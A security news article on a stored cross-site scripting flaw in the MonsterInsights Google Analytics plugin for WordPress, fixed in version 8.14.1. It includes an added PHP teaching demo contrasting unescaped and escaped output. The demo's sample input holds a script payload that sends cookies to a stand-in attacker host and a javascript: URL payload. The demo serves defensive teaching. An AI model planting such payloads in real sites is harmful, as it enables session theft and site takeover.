The National Vulnerability Database announced that a popular Google Analytics WordPress plugin, installed on over 3 million websites, was found to contain a Stored Cross-Site Scripting (XSS) vulnerability.
Stored XSS
A Cross-Site Scripting (XSS) vulnerability typically arises when a part of a website accepts user input and later emits it into a page without validating or escaping it, so that attacker-supplied content such as script tags or links is rendered by the browser as part of the page.
An XSS vulnerability can be leveraged to gain unauthorized access to a website and can lead to user data theft or a full site takeover: a script that executes in a logged-in administrator's browser runs with that administrator's session, and in WordPress that is enough to create users or install further code.
The non-profit Open Worldwide Application Security Project (OWASP) describes how the XSS vulnerability works:
“An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script.
Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site.”
A stored XSS, which is arguably worse, is one in which the malicious script is saved on the website's own server (for example in the database), so it is served to every visitor who loads the affected page rather than requiring each victim to click a crafted link.
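To make the stored-versus-escaped distinction concrete, here is an added PHP example. It is illustration only, not code from MonsterInsights or from any real plugin, and the page does not describe the actual vulnerable code path. The CommentStore class stands in for a database table (hypothetical), and the script and javascript: payloads are constructed sample input, not an exploit against any product. The hardened renderer uses PHP's htmlspecialchars() so the file runs without WordPress; in plugin code the equivalent calls are esc_html() and esc_attr().

```php
<?php
// Added illustration of stored XSS for this article; it is not code from
// MonsterInsights or any other real plugin, and the payloads below are
// constructed sample input, not an exploit against any product.
declare(strict_types=1);

/** Hypothetical in-memory stand-in for the database table where a site saves visitor comments. */
final class CommentStore
{
    /** @var array<int, array{author_url: string, text: string}> */
    private array $rows = [];

    public function save(string $authorUrl, string $text): void
    {
        // Persisting raw input is what makes the XSS "stored": the payload
        // now lives on the server and is replayed to every visitor.
        $this->rows[] = ['author_url' => $authorUrl, 'text' => $text];
    }

    /** @return array<int, array{author_url: string, text: string}> */
    public function all(): array
    {
        return $this->rows;
    }
}

/** Vulnerable rendering: stored values are concatenated into HTML with no escaping. */
function renderCommentsVulnerable(CommentStore $store): string
{
    $html = '<ul>';
    foreach ($store->all() as $row) {
        $html .= '<li><a href="' . $row['author_url'] . '">author</a>: ' . $row['text'] . '</li>';
    }
    return $html . '</ul>';
}

/** Escape for an HTML text or attribute-value context (WordPress code would call esc_html()/esc_attr()). */
function escHtml(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/**
 * A URL placed in href needs scheme validation, not just HTML escaping:
 * htmlspecialchars() leaves "javascript:alert(1)" untouched, so it would still run.
 * Anything that is not http(s) is replaced by a harmless fragment link.
 */
function safeHref(string $url): string
{
    $url = trim($url);
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    $allowed = in_array($scheme, ['http', 'https'], true);
    return escHtml($allowed ? $url : '#');
}

/** Hardened rendering: every stored value is escaped for the context it lands in, at output time. */
function renderCommentsHardened(CommentStore $store): string
{
    $html = '<ul>';
    foreach ($store->all() as $row) {
        $html .= '<li><a href="' . safeHref($row['author_url']) . '">author</a>: '
               . escHtml($row['text']) . '</li>';
    }
    return $html . '</ul>';
}

// Constructed sample input: one benign comment, one with a script in the body,
// one with a javascript: URL that HTML escaping alone would not neutralise.
$store = new CommentStore();
$store->save('https://example.com', 'Great article!');
$store->save('https://example.com', '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>');
$store->save('javascript:alert(document.cookie)', 'Nice theme');

echo "Vulnerable output (scripts reach every visitor):\n", renderCommentsVulnerable($store), "\n\n";
echo "Hardened output (payloads rendered as inert text):\n", renderCommentsHardened($store), "\n";
```

Run it with `php stored_xss_demo.php` (any filename works). The point to take away is that the fix belongs at output time and must match the output context: the same stored string needs HTML escaping in the comment body but scheme validation when it becomes an href, which is why a single "sanitize on save" step is not enough.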
The plugin, MonsterInsights – Google Analytics Dashboard for WordPress, was found to have the stored form of the vulnerability.
MonsterInsights – Google Analytics Dashboard for WordPress Vulnerability
The MonsterInsights Google Analytics plugin is installed on over three million websites, which makes this vulnerability more concerning.
WordPress security company Patchstack, which discovered the vulnerability, published details:
“Rafie Muhammad (Patchstack) discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Google Analytics by MonsterInsights Plugin.
This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site.
This vulnerability has been fixed in version 8.14.1.”
The MonsterInsights plugin changelog on the WordPress plugin repository offered a somewhat vague explanation of the security patch:
“Fixed: We fixed a PHP warning error and added additional security hardening.”
“Security hardening” is a term that can be applied to many tasks related to reducing attack surface, such as removing version numbers from page output.
WordPress has published an entire page about security hardening that recommends tasks such as regular database backups, obtaining themes and plugins from trusted sources, and using strong passwords.
All of those actions are security hardening.
That is why “security hardening” is too broad and generic a term for something as specific (and important) as patching an XSS vulnerability; wording like that can lead a user to skip updating the plugin.
Recommended Action
Patchstack recommends that all users of the MonsterInsights Analytics plugin update it immediately to the latest version, or at least to version 8.14.1.
Read the U.S. National Vulnerability Database announcement:
Read Patchstack’s announcement: